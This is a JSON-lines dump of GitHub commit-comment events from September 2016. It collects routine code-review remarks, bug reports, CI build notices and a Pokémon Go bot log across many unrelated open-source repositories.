{"id":"4501552918","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18861011,"position":null,"line":null,"path":null,"commit_id":"3635568d58810bcd9ed0f4b6ad896be652f4c71b","created_at":"2016-09-01T09:47:51Z","updated_at":"2016-09-01T09:47:51Z","body":"I'll be watching this :/"}},"created_at":"2016-09-01T09:47:51Z"}
{"id":"4501555819","type":"CommitCommentEvent","actor":{"login":"ecsv"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":18861013,"position":null,"line":null,"path":null,"commit_id":"299c437ccd1fd605eef2e15f07397866864cf896","created_at":"2016-09-01T09:48:28Z","updated_at":"2016-09-01T09:48:28Z","body":"Could you please do it correctly next time and not commit all these patches as one single commit (which now looks like you've are the author because you've removed the original author information).\r\n\r\nAnd please also update the entries in patchwork. I will do this now for my own patches - but this is nothing which I should have to do."}},"created_at":"2016-09-01T09:48:28Z"}
{"id":"4501560647","type":"CommitCommentEvent","actor":{"login":"vinipsmaker"},"repo":{"name":"bagder/docs"},"payload":{"comment":{"id":18861024,"position":4,"line":224,"path":"ftp-vs-http.md","commit_id":"0b9fbf137de4bf99485836f27528c28b88b955c1","created_at":"2016-09-01T09:49:28Z","updated_at":"2016-09-01T09:49:28Z","body":"a typo: HTLM"}},"created_at":"2016-09-01T09:49:28Z"}
{"id":"4501567374","type":"CommitCommentEvent","actor":{"login":"bagder"},"repo":{"name":"bagder/docs"},"payload":{"comment":{"id":18861038,"position":4,"line":224,"path":"ftp-vs-http.md","commit_id":"0b9fbf137de4bf99485836f27528c28b88b955c1","created_at":"2016-09-01T09:50:52Z","updated_at":"2016-09-01T09:50:52Z","body":"Oops, thanks! fixed now"}},"created_at":"2016-09-01T09:50:52Z"}
{"id":"4501572448","type":"CommitCommentEvent","actor":{"login":"miherlosev"},"repo":{"name":"LavrovArtem/testcafe-hammerhead"},"payload":{"comment":{"id":18861047,"position":32,"line":785,"path":"src/client/sandbox/code-instrumentation/properties/index.js","commit_id":"2983dca1b2874a30e74927fa8080b9366a6ecb5a","created_at":"2016-09-01T09:51:56Z","updated_at":"2016-09-01T09:51:56Z","body":"Need refactor as:\r\n1. `if (typeUtils.isNullOrUndefined(owner))` condition\r\n2.  `var targetAccesors = _getAccessors(owner)`; \r\n`_getAccessors` calculates accessors by processingContext window.\r\n3. `return targetAccesors[propName].set(owner, value)"}},"created_at":"2016-09-01T09:51:56Z"}
{"id":"4501572517","type":"CommitCommentEvent","actor":{"login":"mazharoddin"},"repo":{"name":"Decor-Aid/camaleon-ecommerce"},"payload":{"comment":{"id":18861048,"position":null,"line":null,"path":null,"commit_id":"0cb58177f6fe33f14a23f83904b84fab54963104","created_at":"2016-09-01T09:51:56Z","updated_at":"2016-09-01T09:51:56Z","body":"Hi @p-decoraid , yes this fix is working for not logged in users aswell. Thanks."}},"created_at":"2016-09-01T09:51:56Z"}
{"id":"4501573373","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"nickbradley/Test"},"payload":{"comment":{"id":18861050,"position":null,"line":null,"path":null,"commit_id":"9b6419d27497a58c41c86e5f0406a1b9805bfad8","created_at":"2016-09-01T09:52:08Z","updated_at":"2016-09-01T09:52:08Z","body":"Mark me"}},"created_at":"2016-09-01T09:52:08Z"}
{"id":"4501575640","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Botanik1592/tutu"},"payload":{"comment":{"id":18861060,"position":6,"line":6,"path":"app/models/railway_station.rb","commit_id":"9543e49e2870d7cf2feabea0f33f63762810057d","created_at":"2016-09-01T09:52:35Z","updated_at":"2016-09-01T09:52:35Z","body":"Так не получится, т.к. у тебя у билета настандартные ассоциации (ну т.е. названия полей другие), поэтому, во-первых, станция будет иметь билеты, где она начальная и билеты, где она конечная. А во-вторых, если название поле нестандартное, то нужно указывать foreign_key и со стороны ассоциации has_many."}},"created_at":"2016-09-01T09:52:35Z"}
{"id":"4501580873","type":"CommitCommentEvent","actor":{"login":"liskin"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18861071,"position":83,"line":256,"path":"XMonad/Hooks/ManageDocks.hs","commit_id":"a5e87e38940190a363ee7b90595816e74e468488","created_at":"2016-09-01T09:53:41Z","updated_at":"2016-09-01T09:53:41Z","body":"If cache is Nothing, it's quite likely that sset/nsset are invalid as well, no? In that case it would probably be a good idea to actually query all the tree. Isn't this what makes https://github.com/xmonad/xmonad-contrib/commit/28e9f8bce781e6511b75a1c1e35f1cea4cecfefe necessary?"}},"created_at":"2016-09-01T09:53:41Z"}
{"id":"4501582095","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android"},"payload":{"comment":{"id":18861072,"position":null,"line":null,"path":null,"commit_id":"4074745352cb186ad977d72ce043256a9f0a0dc9","created_at":"2016-09-01T09:53:57Z","updated_at":"2016-09-01T09:53:57Z","body":"You'll need to have a patch for new audio HAL"}},"created_at":"2016-09-01T09:53:57Z"}
{"id":"4501582262","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Botanik1592/tutu"},"payload":{"comment":{"id":18861073,"position":2,"line":2,"path":"app/models/railway_station.rb","commit_id":"9543e49e2870d7cf2feabea0f33f63762810057d","created_at":"2016-09-01T09:53:59Z","updated_at":"2016-09-01T09:53:59Z","body":"принято в моделях сначала указывать ассоциации, потом валидации. Поправь это во всех моделях"}},"created_at":"2016-09-01T09:53:59Z"}
{"id":"4501585459","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"nickbradley/Test"},"payload":{"comment":{"id":18861081,"position":null,"line":null,"path":null,"commit_id":"fd24246bd04a23f2044e2161729c02dc826a7f8a","created_at":"2016-09-01T09:54:39Z","updated_at":"2016-09-01T09:54:39Z","body":"Submit"}},"created_at":"2016-09-01T09:54:39Z"}
{"id":"4501588762","type":"CommitCommentEvent","actor":{"login":"miherlosev"},"repo":{"name":"LavrovArtem/testcafe-hammerhead"},"payload":{"comment":{"id":18861088,"position":5,"line":240,"path":"test/client/fixtures/sandbox/code-instrumentation/setters-test.js","commit_id":"2983dca1b2874a30e74927fa8080b9366a6ecb5a","created_at":"2016-09-01T09:55:22Z","updated_at":"2016-09-01T09:55:22Z","body":"Add tests for following cases:\r\niframe.contentDocument.<tagOrObject>[intrumentedProperty] equals `undefined`.\r\niframe.contentDocument.<tagOrObject>[intrumentedProperty]  has non string type."}},"created_at":"2016-09-01T09:55:22Z"}
{"id":"4501591029","type":"CommitCommentEvent","actor":{"login":"GPenn"},"repo":{"name":"Bristol-SiD-Development/summer-student"},"payload":{"comment":{"id":18861091,"position":null,"line":null,"path":null,"commit_id":"05856366f05526e44d92c82160fc4e62ce30d863","created_at":"2016-09-01T09:55:52Z","updated_at":"2016-09-01T09:55:52Z","body":"Please note: mistake in commit message, should be \"(tracker material->lead)\""}},"created_at":"2016-09-01T09:55:52Z"}
{"id":"4501591731","type":"CommitCommentEvent","actor":{"login":"brainwipe"},"repo":{"name":"brainwipe/NJsonApiCore"},"payload":{"comment":{"id":18861093,"position":null,"line":null,"path":null,"commit_id":"771887d82d8a962b8122ac5542f412d6d9a7db24","created_at":"2016-09-01T09:56:02Z","updated_at":"2016-09-01T09:56:02Z","body":"For #10"}},"created_at":"2016-09-01T09:56:02Z"}
{"id":"4501592160","type":"CommitCommentEvent","actor":{"login":"JhonnyRomero"},"repo":{"name":"JhonnyRomero/clase-sistop-2017-01"},"payload":{"comment":{"id":18861097,"position":null,"line":null,"path":null,"commit_id":"b0796e65aa92c6d2b6e71025927272768fba974b","created_at":"2016-09-01T09:56:09Z","updated_at":"2016-09-01T09:56:09Z","body":"Tarea no. 1"}},"created_at":"2016-09-01T09:56:09Z"}
{"id":"4501597128","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android"},"payload":{"comment":{"id":18861110,"position":null,"line":null,"path":null,"commit_id":"135732073b58abbe7ebdd5e7d3f367bb54039216","created_at":"2016-09-01T09:57:13Z","updated_at":"2016-09-01T09:57:13Z","body":"How will it be difficult for you to port Audio/Video patches?"}},"created_at":"2016-09-01T09:57:13Z"}
{"id":"4501598285","type":"CommitCommentEvent","actor":{"login":"liskin"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18861113,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T09:57:27Z","updated_at":"2016-09-01T09:57:27Z","body":"Anyway, it makes very little sense to store the cache and smap in the AvoidStruts instance. It's not a per-layout thing, it's a global cache. XMonad.Util.ExtensibleState should be used here, I think, and it should be a StateExtension, not PersistentExtension."}},"created_at":"2016-09-01T09:57:27Z"}
{"id":"4501601719","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18861119,"position":46,"line":63,"path":"lesson_9/modules.rb","commit_id":"bd47961a8a346b5358dbce1f03215d27c8c7a9c0","created_at":"2016-09-01T09:58:14Z","updated_at":"2016-09-01T09:58:14Z","body":"Идея верная, но во-первых, на один атрибут может быть несколько валидаций, поэтому сами валидаторы и их аргументы надо хранить в массиве (или в массиве хешей).  А во-вторых сам @validate_rules надо оставить хешем, но ключами у него сделать названия атрибутов. Т.е. должно что-то такое получиться:\r\n\r\n`@validate_rules[name] << [type, args]`\r\n\r\nИ зачем ты все преобразовываешь в строку? Например, args? Как потом с ними работать, с этими аругемнтами?"}},"created_at":"2016-09-01T09:58:14Z"}
{"id":"4501602265","type":"CommitCommentEvent","actor":{"login":"malte0811"},"repo":{"name":"BluSunrize/ImmersiveEngineering"},"payload":{"comment":{"id":18861121,"position":null,"line":null,"path":null,"commit_id":"e78132415d7a78cfb5c480626d08efd26600ac18","created_at":"2016-09-01T09:58:19Z","updated_at":"2016-09-01T09:58:19Z","body":"I just remembered what that was for, CC used to have a waitForCooldown method that called wait on the TE. I think I removed that method in 1.8 since it was crashing the CC computers every so often, so removing this is fine."}},"created_at":"2016-09-01T09:58:19Z"}
{"id":"4501603842","type":"CommitCommentEvent","actor":{"login":"ValcanoCan"},"repo":{"name":"ValcanoCan/monment"},"payload":{"comment":{"id":18861123,"position":null,"line":null,"path":null,"commit_id":"6450213c811cb433a790b16074f32e3fd9b924b5","created_at":"2016-09-01T09:58:38Z","updated_at":"2016-09-01T09:58:38Z","body":"111"}},"created_at":"2016-09-01T09:58:38Z"}
{"id":"4501604300","type":"CommitCommentEvent","actor":{"login":"ValcanoCan"},"repo":{"name":"ValcanoCan/monment"},"payload":{"comment":{"id":18861124,"position":null,"line":null,"path":null,"commit_id":"6450213c811cb433a790b16074f32e3fd9b924b5","created_at":"2016-09-01T09:58:43Z","updated_at":"2016-09-01T09:58:43Z","body":"111"}},"created_at":"2016-09-01T09:58:43Z"}
{"id":"4501606064","type":"CommitCommentEvent","actor":{"login":"gau-veldt"},"repo":{"name":"gau-veldt/OmegaRising"},"payload":{"comment":{"id":18861130,"position":null,"line":null,"path":null,"commit_id":"90e1886ea446a3f45da052cc8efb74140a26ac86","created_at":"2016-09-01T09:59:06Z","updated_at":"2016-09-01T09:59:06Z","body":"Login dialog:\r\n![Login Dialog](https://cloud.githubusercontent.com/assets/1862162/18163410/b88da964-6fef-11e6-92af-3ac0f401d069.png)\r\n\r\nStatus dialog:\r\n![Status Dialog](https://cloud.githubusercontent.com/assets/1862162/18163464/f7918a72-6fef-11e6-991d-604b9dad1705.png)\r\n"}},"created_at":"2016-09-01T09:59:06Z"}
{"id":"4501608383","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"ishantvivek/android"},"payload":{"comment":{"id":18861133,"position":null,"line":null,"path":null,"commit_id":"135732073b58abbe7ebdd5e7d3f367bb54039216","created_at":"2016-09-01T09:59:32Z","updated_at":"2016-09-01T09:59:32Z","body":"By the way, Wi-Fi worked on your latest AOSP 7.0 build"}},"created_at":"2016-09-01T09:59:32Z"}
{"id":"4501608764","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Melevolen/ruby_way"},"payload":{"comment":{"id":18861134,"position":61,"line":75,"path":"lesson_9/modules.rb","commit_id":"bd47961a8a346b5358dbce1f03215d27c8c7a9c0","created_at":"2016-09-01T09:59:36Z","updated_at":"2016-09-01T09:59:36Z","body":"Не получится использовать @validate_rules напрямую, это же переменная уровня класса (почти как класс-переменная). Надо сделать геттер в  ClassMethods для нее и обрщаться к нему как к методу класса."}},"created_at":"2016-09-01T09:59:36Z"}
{"id":"4501610484","type":"CommitCommentEvent","actor":{"login":"ValcanoCan"},"repo":{"name":"ValcanoCan/monment"},"payload":{"comment":{"id":18861139,"position":null,"line":null,"path":null,"commit_id":"6450213c811cb433a790b16074f32e3fd9b924b5","created_at":"2016-09-01T09:59:58Z","updated_at":"2016-09-01T09:59:58Z","body":"111"}},"created_at":"2016-09-01T09:59:58Z"}
{"id":"4505832169","type":"CommitCommentEvent","actor":{"login":"arnocandel"},"repo":{"name":"h2oai/h2o-3"},"payload":{"comment":{"id":18872637,"position":null,"line":null,"path":null,"commit_id":"42dec7ab6f48946f6b86170a0036172e571fc77a","created_at":"2016-09-02T00:00:10Z","updated_at":"2016-09-02T00:00:10Z","body":"looks fine, can you add a RUnit to compare against base R?"}},"created_at":"2016-09-02T00:00:10Z"}
{"id":"4505832417","type":"CommitCommentEvent","actor":{"login":"joshdekock"},"repo":{"name":"rubenv/sql-migrate"},"payload":{"comment":{"id":18872638,"position":null,"line":null,"path":null,"commit_id":"6f4757563362064790a6687a6b60f182062c8634","created_at":"2016-09-02T00:00:14Z","updated_at":"2016-09-02T00:00:14Z","body":"What was the reason for this?"}},"created_at":"2016-09-02T00:00:14Z"}
{"id":"4505832750","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18872640,"position":null,"line":null,"path":null,"commit_id":"24b045af22fdced9bc2b3b5dcb3678af8dc688c9","created_at":"2016-09-02T00:00:18Z","updated_at":"2016-09-02T00:00:18Z","body":"develop (macumber) - i386-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-02T00:00:18Z"}
{"id":"4505835534","type":"CommitCommentEvent","actor":{"login":"christianoz"},"repo":{"name":"christianoz/Christian-philosophy"},"payload":{"comment":{"id":18872652,"position":null,"line":null,"path":null,"commit_id":"5d063df4e6112533b5695375d9c702d885d198ce","created_at":"2016-09-02T00:01:06Z","updated_at":"2016-09-02T00:01:06Z","body":"I'm exploring the philosophical arguments for and against biblical Christianity in the context of the modern secular humanist and atheist world views.\r\n\r\n"}},"created_at":"2016-09-02T00:01:06Z"}
{"id":"4505837076","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18872656,"position":null,"line":null,"path":null,"commit_id":"24b045af22fdced9bc2b3b5dcb3678af8dc688c9","created_at":"2016-09-02T00:01:32Z","updated_at":"2016-09-02T00:01:32Z","body":"develop (macumber) - x86_64-MacOS-10.10-clang: OK (2388 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.55%25-yellow.svg)</a> \n"}},"created_at":"2016-09-02T00:01:32Z"}
{"id":"4505840680","type":"CommitCommentEvent","actor":{"login":"vigiljose"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18872666,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-02T00:02:43Z","updated_at":"2016-09-02T00:02:43Z","body":"Hi lekma,\r\n\r\nUsing your branch, I got vaapi working! So first thing: Thank you for your fantastic job!\r\nHowever something strange is happening, even when the gpu is working (checked with intel_gpu_top), if I have to clients connected to my tvheadend server and both using vaapi, I get a lot of pixeling when the heigh pixels is >300 aprox.\r\n\r\nI also see the cpu at 140-160% (it's an i7 -> a mac mini with 16GB RAM), I'm using gentoo linux.\r\nI spent the entire day doing tests with a friend who has different hardware and the results were identical. gpu is at 20% and we tried many different combinations.\r\n\r\nIf I don't use hardware transcoding... I get also a lot of pixelling even with one stream (cpu at 130% out of 800% -> i7). So, it seems that when cpu consume increases, something starts braking, because the cpu & gpu hardware limits are still far away.\r\n\r\nHave you experienced something similar? Any tip? to focus the troubleshooting?\r\n\r\nCvH: Do you have the same issue?\r\n\r\nThank you so much!\r\nJose\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-02T00:02:43Z"}
{"id":"4505841346","type":"CommitCommentEvent","actor":{"login":"ArashPartow"},"repo":{"name":"ArashPartow/math-parser-benchmark-project"},"payload":{"comment":{"id":18872669,"position":null,"line":null,"path":null,"commit_id":"62f69936ec96803f70d983ad324ba6f68f298de3","created_at":"2016-09-02T00:02:58Z","updated_at":"2016-09-02T00:02:58Z","body":"I'd be more than happy to include it. Would you be able to create a pull with the specific parser benchmark? \r\n\r\nLooking at the examples, I can see how it \"can\" be used, but I don't see anything specific on how it should be used for high-performance scenario.  Also atm I'm a bit time constrained. Examples to write an SeExpr benchmark can be found here: https://github.com/ArashPartow/math-parser-benchmark-project/tree/master/src\r\n\r\nThat being said I too would also very much like to see an LLVM based parser in the suite. A comparison between an LLVM parser and the native mode should be quite interesting.\r\n\r\n"}},"created_at":"2016-09-02T00:02:58Z"}
{"id":"4505846633","type":"CommitCommentEvent","actor":{"login":"Brazuca87"},"repo":{"name":"NoxxDev/NecroBot"},"payload":{"comment":{"id":18872686,"position":null,"line":null,"path":null,"commit_id":"cace722f9930ba0e70d99adec653329f39f7dbc2","created_at":"2016-09-02T00:04:49Z","updated_at":"2016-09-02T00:04:49Z","body":"I think something got broken here... I updated my commits up to here, launch bot, and it just sits there not doing any actions...\r\n\r\n```\r\n[18:47:39] Perfect! You already have the newest Version 0.9.7\r\n[18:47:39] Logging in using Ptc\r\n[18:47:39] Your IP is: \r\n[18:47:52] Playing as \r\n[18:47:54] Make sure Lat & Lng are right. \r\n[18:47:54] Program will continue after the key press...\r\n[18:48:08] Without a Google Api, you will have 2500 free quota limit, if you reach the maximum quota, try to change your IP. To configure \"GoogleAPIKey\", get API Key in link: https://developers.google.com/maps/documentation/directions/get-api-key\r\n[18:48:08] ====== DisplayHighestsCP ======\r\n[18:48:08] # CP 2126/2223 | (67.11% perfect)\t| Lvl 25\t NAME: Snorlax   \t MOVE1: LickFast             MOVE2: HyperBeam            Candy: 28\r\n[18:48:08] # CP 2008/2172 | (45.16% perfect)\t| Lvl 27\t NAME: Vaporeon  \t MOVE1: WaterGunFast         MOVE2: HydroPump            Candy: 597\r\n[18:48:08] # CP 1890/1956 | (74.50% perfect)\t| Lvl 22\t NAME: Snorlax   \t MOVE1: LickFast             MOVE2: BodySlam             Candy: 28\r\n[18:48:08] # CP 1762/1857 | (62.06% perfect)\t| Lvl 22\t NAME: Exeggutor \t MOVE1: ZenHeadbuttFast      MOVE2: SolarBeam            Candy: 280\r\n[18:48:08] # CP 1666/1747 | (69.79% perfect)\t| Lvl 27\t NAME: Magmar    \t MOVE1: KarateChopFast       MOVE2: FireBlast            Candy: 70\r\n[18:48:08] # CP 1639/1775 | (47.38% perfect)\t| Lvl 25\t NAME: Nidoqueen \t MOVE1: PoisonJabFast        MOVE2: SludgeWave           Candy: 1114\r\n[18:48:08] # CP 1515/1540 | (89.85% perfect)\t| Lvl 26\t NAME: Scyther   \t MOVE1: SteelWingFast        MOVE2: XScissor             Candy: 84\r\n[18:48:08] # CP 1509/1604 | (56.16% perfect)\t| Lvl 19\t NAME: Exeggutor \t MOVE1: ZenHeadbuttFast      MOVE2: SolarBeam            Candy: 280\r\n[18:48:08] # CP 1487/1515 | (88.35% perfect)\t| Lvl 25\t NAME: Pinsir    \t MOVE1: FuryCutterFast       MOVE2: Submission           Candy: 213\r\n[18:48:08] # CP 1483/1621 | (45.84% perfect)\t| Lvl 26\t NAME: Starmie   \t MOVE1: WaterGunFast         MOVE2: HydroPump            Candy: 386\r\n[18:48:09] ====== DisplayHighestsPerfect ======\r\n[18:48:09] # CP  631/ 634 | (97.96% perfect)\t| Lvl 20\t NAME: Psyduck   \t MOVE1: WaterGunFast         MOVE2: AquaTail             Candy: 698\r\n[18:48:09] # CP  319/ 321 | (97.23% perfect)\t| Lvl 12\t NAME: Staryu    \t MOVE1: WaterGunFast         MOVE2: BubbleBeam           Candy: 386\r\n[18:48:09] # CP  350/ 353 | (96.62% perfect)\t| Lvl 12\t NAME: Venonat   \t MOVE1: BugBiteFast          MOVE2: PoisonFang           Candy: 442\r\n[18:48:09] # CP   15/  15 | (96.52% perfect)\t| Lvl 01\t NAME: Eevee     \t MOVE1: QuickAttackFast      MOVE2: BodySlam             Candy: 597\r\n[18:48:09] # CP  589/ 592 | (96.35% perfect)\t| Lvl 10\t NAME: Scyther   \t MOVE1: SteelWingFast        MOVE2: NightSlash           Candy: 84\r\n[18:48:09] # CP  556/ 562 | (95.70% perfect)\t| Lvl 21\t NAME: Staryu    \t MOVE1: WaterGunFast         MOVE2: PowerGem             Candy: 386\r\n[18:48:09] # CP  176/ 180 | (95.64% perfect)\t| Lvl 24\t NAME: Magikarp  \t MOVE1: SplashFast           MOVE2: Struggle             Candy: 1666\r\n[18:48:09] # CP  249/ 253 | (95.60% perfect)\t| Lvl 20\t NAME: Caterpie  \t MOVE1: BugBiteFast          MOVE2: Struggle             Candy: 50\r\n[18:48:09] # CP  438/ 442 | (94.94% perfect)\t| Lvl 07\t NAME: Magmar    \t MOVE1: KarateChopFast       MOVE2: FirePunch            Candy: 70\r\n[18:48:09] # CP  668/ 676 | (94.93% perfect)\t| Lvl 23\t NAME: Venonat   \t MOVE1: ConfusionFast        MOVE2: SignalBeam           Candy: 442\r\n[18:48:09] Potential Evolutions: 35\r\n[18:48:09] Waiting to evolve 35 Pokemon once 40 more are caught! (177/217 for 90% inventory)\r\n[18:48:09] Incubator status update: 1.74km left\r\n[18:48:09] Incubator status update: 0.22km left\r\n[18:48:10] Amount of Pokemon Seen: 115/151, Amount of Pokemon Caught: 115/151\r\n[18:53:13]  ##### config.json ##### \r\n```"}},"created_at":"2016-09-02T00:04:49Z"}
{"id":"4505850665","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18872693,"position":44,"line":64,"path":"Lesson_7/classes/interface/interface.rb","commit_id":"eba740ea774e7f31b14578a4e8debf614fa82d9f","created_at":"2016-09-02T00:06:04Z","updated_at":"2016-09-02T00:06:04Z","body":"Во, теперь отлично!"}},"created_at":"2016-09-02T00:06:04Z"}
{"id":"4505850939","type":"CommitCommentEvent","actor":{"login":"jonthysell"},"repo":{"name":"jonthysell/Mzinga"},"payload":{"comment":{"id":18872694,"position":null,"line":null,"path":null,"commit_id":"45775367f0c4ff061e6b163fff1dd3cb9393333e","created_at":"2016-09-02T00:06:10Z","updated_at":"2016-09-02T00:06:10Z","body":"Thanks for the feedback! I've already got parameters for pinned (which just means the piece can't move, which counts if there is a beetle on top of it) and of course a beetle on top usually also increases the number of available \"placements\" of new pieces. I'm trying to keep the algorithm generic - though I could see adding a \"is piece covered by beetle\" metric, and then maybe the weight for QueenBee.CoveredByBeetle would trend upward. The real question is how long it takes to calculate if there's a beetle on top, and if that slows down the board evaluation for the rest of metrics.\r\n\r\n\r\nYeah, the viewer is really just there for a convenience and testing. I specifically chose just using the letters because I'm not trying to compete with any of the existing commercial version of Hive and I didn't want to use any of the copyrighted art from the real game without permission. That said, there is plenty of room for improving the viewer."}},"created_at":"2016-09-02T00:06:10Z"}
{"id":"4505853135","type":"CommitCommentEvent","actor":{"login":"benjaminfuchs"},"repo":{"name":"benjaminfuchs/warnings-plugin"},"payload":{"comment":{"id":18872700,"position":23,"line":23,"path":"src/test/java/hudson/plugins/warnings/WarningsMultiBranchTest.java","commit_id":"4b0d422b7709f14745a5bfad90bc43eb686e69fe","created_at":"2016-09-02T00:06:54Z","updated_at":"2016-09-02T00:06:54Z","body":"TODO Cleanup imports"}},"created_at":"2016-09-02T00:06:54Z"}
{"id":"4505854363","type":"CommitCommentEvent","actor":{"login":"techieshark"},"repo":{"name":"CodeforAustralia/heritage-near-me"},"payload":{"comment":{"id":18872708,"position":4,"line":383,"path":"prototype/style.css","commit_id":"a9f652798f01457831d19f86271c235150dae54f","created_at":"2016-09-02T00:07:19Z","updated_at":"2016-09-02T00:07:19Z","body":"see also: http://www.daveoncode.com/2013/01/03/custom-input-type-submit-safari-mobile-css/"}},"created_at":"2016-09-02T00:07:19Z"}
{"id":"4505854625","type":"CommitCommentEvent","actor":{"login":"RamyElkest"},"repo":{"name":"sbeleidy/saadelbeleidy"},"payload":{"comment":{"id":18872709,"position":null,"line":null,"path":null,"commit_id":"1449b59ee508d26e0c8ee72ac9a0197c0a3e3276","created_at":"2016-09-02T00:07:25Z","updated_at":"2016-09-02T00:07:25Z","body":"Are there copyright restrictions on the images? :+1: "}},"created_at":"2016-09-02T00:07:25Z"}
{"id":"4505854827","type":"CommitCommentEvent","actor":{"login":"aslakknutsen"},"repo":{"name":"almighty/almighty-core"},"payload":{"comment":{"id":18872711,"position":22,"line":20,"path":"Dockerfile.deploy","commit_id":"bfa03ea6fabb016b4a4a943e1a04fc18893dff3e","created_at":"2016-09-02T00:07:29Z","updated_at":"2016-09-02T00:07:29Z","body":"@kwk  ? \r\n\r\n```\r\n$ docker run e52b44d0af61\r\nexec: \"${ALMIGHTY_INSTALL_PREFIX}/bin/alm\": stat ${ALMIGHTY_INSTALL_PREFIX}/bin/alm: no such file or directory\r\ndocker: Error response from daemon: Container command not found or does not exist..\r\n```"}},"created_at":"2016-09-02T00:07:29Z"}
{"id":"4505856660","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"balashovmb/mb_ror_basic"},"payload":{"comment":{"id":18872713,"position":48,"line":68,"path":"Lesson_7/classes/interface/interface.rb","commit_id":"eba740ea774e7f31b14578a4e8debf614fa82d9f","created_at":"2016-09-02T00:08:09Z","updated_at":"2016-09-02T00:08:09Z","body":"Если честно, обычно так не делают - не определяют отдельно лямбду и потом её передают. Обычно делают сразу:\r\n\r\n```ruby\r\nstation.each_train do |train|\r\n  puts \"Номер: #{train.number}\"\r\nend\r\n```"}},"created_at":"2016-09-02T00:08:09Z"}
{"id":"4505856826","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18872714,"position":null,"line":null,"path":null,"commit_id":"8e567570eec5a2d4570a376bb7431ee280d36513","created_at":"2016-09-02T00:08:11Z","updated_at":"2016-09-02T00:08:11Z","body":"Which item id?"}},"created_at":"2016-09-02T00:08:11Z"}
{"id":"4505860451","type":"CommitCommentEvent","actor":{"login":"ahayek84"},"repo":{"name":"laracamp/tdd"},"payload":{"comment":{"id":18872729,"position":null,"line":null,"path":null,"commit_id":"1884df6e07520feb9bbce3f2117d4201ff8202ce","created_at":"2016-09-02T00:09:22Z","updated_at":"2016-09-02T00:09:22Z","body":"I have modified the file and uploaded it to my repo \r\nhttps://github.com/ahayek84/repo/tree/master/tests\r\nFileName =  ShippingMTest.php"}},"created_at":"2016-09-02T00:09:22Z"}
{"id":"4505863264","type":"CommitCommentEvent","actor":{"login":"sbeleidy"},"repo":{"name":"sbeleidy/saadelbeleidy"},"payload":{"comment":{"id":18872741,"position":null,"line":null,"path":null,"commit_id":"1449b59ee508d26e0c8ee72ac9a0197c0a3e3276","created_at":"2016-09-02T00:10:16Z","updated_at":"2016-09-02T00:10:16Z","body":"They're labeled for reuse."}},"created_at":"2016-09-02T00:10:16Z"}
{"id":"4505864243","type":"CommitCommentEvent","actor":{"login":"NoxxDev"},"repo":{"name":"NoxxDev/NecroBot"},"payload":{"comment":{"id":18872747,"position":null,"line":null,"path":null,"commit_id":"cace722f9930ba0e70d99adec653329f39f7dbc2","created_at":"2016-09-02T00:10:35Z","updated_at":"2016-09-02T00:10:35Z","body":"@Brazuca87 \r\n\r\nDeleted \r\n`DelayBetweenRecycleActions`\r\n\r\nAdded \r\n`TransferActionDelay`\r\n`RecycleActionDelay`\r\n`RenamePokemonActionDelay`\r\n\r\nChanged from your pr\r\n- `MinEvolveActionDelay`\r\n- `MaxEvolveActionDelay`\r\n+ `EvolveActionDelay`\r\n\r\nCheck your config.json and update"}},"created_at":"2016-09-02T00:10:35Z"}
